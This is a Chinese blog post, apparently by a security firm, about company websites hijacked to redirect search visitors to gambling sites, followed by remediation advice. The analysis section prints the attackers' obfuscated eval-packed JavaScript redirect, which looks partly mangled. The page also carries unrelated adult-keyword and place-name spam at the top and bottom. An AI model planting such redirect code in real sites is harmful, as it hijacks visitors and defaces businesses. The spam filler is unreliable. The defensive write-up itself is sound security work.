成人午夜视频全免费观看高清-秋霞福利视频一区二区三区-国产精品久久久久电影小说-亚洲不卡区三一区三区一区

公司網(wǎng)站被跳轉(zhuǎn)到彩票、賭博網(wǎng)站怎么處理?

2022-07-04    分類: 網(wǎng)站建設(shè)

最近一段時間,我們SINE安全公司一連接到數(shù)十個公司網(wǎng)站被跳轉(zhuǎn)到bocai網(wǎng)站上去,客戶反映從百度搜索網(wǎng)站進去,直接跳轉(zhuǎn)到彩票網(wǎng)站上,直接輸入網(wǎng)址沒有跳轉(zhuǎn),導(dǎo)致客戶網(wǎng)站的流量急劇下滑,做的百度推廣跟搜狗推廣,都給彩票網(wǎng)站做廣告了,公司領(lǐng)導(dǎo)高度重視網(wǎng)站安全的問題,因為給公司的形象以及名譽帶來的損失太大了,我們安排安全技術(shù)人員對其網(wǎng)站進行全面的網(wǎng)站安全檢測,對網(wǎng)站存在的漏洞,以及木馬后門進行全面的清除與漏洞修復(fù),安全加固。關(guān)于網(wǎng)站被跳轉(zhuǎn)到彩票、bocai網(wǎng)站的問題,整理一份詳細的處理過程,希望幫到更多遇到這種情況的站長,以及公司網(wǎng)站運營者。

網(wǎng)站被跳轉(zhuǎn)彩票網(wǎng)站問題分析

我們SINE安全跟公司網(wǎng)站負責(zé)人進行了詳細的服務(wù)器信息(服務(wù)器Ip 遠程端口 管理員賬號密碼、SSH端口、root賬號密碼),網(wǎng)站信息包括FTp賬號密碼的對接,由安全部署部門技術(shù)對網(wǎng)站的代碼以及服務(wù)器系統(tǒng)進行縝密的安全檢測與分析。

在整體的安全檢測當中我們發(fā)現(xiàn)客戶的網(wǎng)站都存在網(wǎng)站木馬后門,包括php腳本木馬,asp腳本木馬,jsp腳本木馬,我們通常叫大馬,可以對網(wǎng)站進行惡意篡改,上傳,改名,下載,等管理員的高權(quán)限操作。出現(xiàn)網(wǎng)站被跳轉(zhuǎn)的客戶,采用的網(wǎng)站架構(gòu)都是php+mysql架構(gòu),以及jsp+mysql架構(gòu),大多數(shù)用的是開源程序,像dedecms,織夢系統(tǒng),phpcms系統(tǒng),discuz系統(tǒng)。

由于之前客戶網(wǎng)站總是被跳轉(zhuǎn)到彩票、賭博網(wǎng)站,客戶只是懂一些簡單的代碼,只能通過篡改的首頁代碼里,找到惡意代碼進行刪除,但是治標不治本,沒過幾天網(wǎng)站又被跳轉(zhuǎn)了,客戶經(jīng)常為這些問題煩惱,每天提心吊膽的。其實問題的根本原因在于網(wǎng)站存在漏洞,以及服務(wù)器安全沒有做好。我們SINE處理了成千上百的網(wǎng)站,總結(jié)的經(jīng)驗來看,網(wǎng)站首頁被篡改的幾率大,都是篡改首頁的標題,描述,以及在首頁頂部添加一些加密的字符,如下圖所示:

北京賽車投注平臺_北京賽車pk10網(wǎng)上開戶_北京賽車pk10登錄平臺

以上代碼就是被攻擊者添加的加密的標題與描述,解密后發(fā)現(xiàn)內(nèi)容是什么北京賽車,時時彩,pK10等賭博內(nèi)容。還有一個被攻擊的特征就是在首頁你會發(fā)現(xiàn)一段跳轉(zhuǎn)的代碼,該代碼是根據(jù)搜索引擎的特征來進行判斷跳轉(zhuǎn),比如判斷客戶的訪問來路是通過百度搜索,360搜索,搜狗搜索來的會直接跳轉(zhuǎn)到賭博網(wǎng)站上去。如下代碼:

type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('l["ec1mi8n0"]["74908"]('h2149300j38d608k05fara2149306241d6s0032q55777b13ea2pb1ci5jo1bf26gh5214930g');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

跳轉(zhuǎn)到的彩票網(wǎng)站如下截圖:

再一個攻擊特征就是網(wǎng)站在百度里搜索,出現(xiàn)紅色風(fēng)險標識, 百度網(wǎng)址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 紅色提示該百度風(fēng)險。導(dǎo)致客戶打開網(wǎng)站直接被百度攔截,如下圖所示:

百度網(wǎng)址安全中心提醒您:

該站點可能受到黑客攻擊,部分頁面已被非法篡改! 查看詳情

您正在訪問:http*******com/

該站點可能由于受到黑客攻擊,部分頁面已被非法篡改,可能會威脅到您的財產(chǎn)和信息安全,建議您謹慎訪問。

站點(******.com/)發(fā)現(xiàn)的非法篡改頁面,可參考以下示例:

被黑網(wǎng)址快照1:********com/011E...

被黑網(wǎng)址快照2:********com/010S...

被黑網(wǎng)址快照3:********com/004G...

針對以上網(wǎng)站被跳轉(zhuǎn)攻擊的特征,我們SINE對其進行全面的人工代碼安全審計,以及網(wǎng)站漏洞檢測,網(wǎng)站木馬后門清理,發(fā)現(xiàn)dedecms網(wǎng)站存在sql注入漏洞,以及xss獲取管理員賬號cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過漏洞,針對上述漏洞我們進行了全面的修復(fù),并做了網(wǎng)站安全部署,以及服務(wù)器安全部署,網(wǎng)站文件防篡改部署。

防止網(wǎng)站被跳轉(zhuǎn)的解決方法如下:

1.對服務(wù)器目錄權(quán)限的安全部署,對管理員賬號密碼加密,盡可能設(shè)置的復(fù)雜一些,數(shù)字+大小寫字母+特殊符號,對網(wǎng)站數(shù)據(jù)庫進行分配普通權(quán)限賬號。

2.mysql數(shù)據(jù)庫默認端口3306,改為61116,并加入到端口安全策略,不對外開放,外網(wǎng)Ip無法連接數(shù)據(jù)庫,只有本地127.0.0.1才能進行連接數(shù)據(jù)庫,以防止攻擊者惡意猜測。

3.對服務(wù)器底層系統(tǒng)進行安全加固,包括遠程端口登錄的安全驗證。

4.對網(wǎng)站代碼進行整體的安全檢測,包括定期的升級網(wǎng)站程序源代碼,修復(fù)補丁以及網(wǎng)站漏洞。

網(wǎng)站題目:公司網(wǎng)站被跳轉(zhuǎn)到彩票、賭博網(wǎng)站怎么處理?
本文網(wǎng)址:http://jinyejixie.com/news45/174295.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供關(guān)鍵詞優(yōu)化Google、建站公司外貿(mào)建站、電子商務(wù)、商城網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都seo排名網(wǎng)站優(yōu)化
斗六市| 衡山县| 四子王旗| 左云县| 花垣县| 宣武区| 鸡西市| 常德市| 高州市| 遂昌县| 大石桥市| 铜山县| 桐乡市| 邹平县| 寿阳县| 印江| 澎湖县| 琼海市| 台州市| 乳源| 泸定县| 宝清县| 永仁县| 长汀县| 西青区| 汝州市| 南溪县| 武乡县| 安泽县| 浦县| 资阳市| 沁水县| 乡宁县| 靖江市| 孟州市| 自治县| 德昌县| 财经| 吴忠市| 台南县| 沾益县|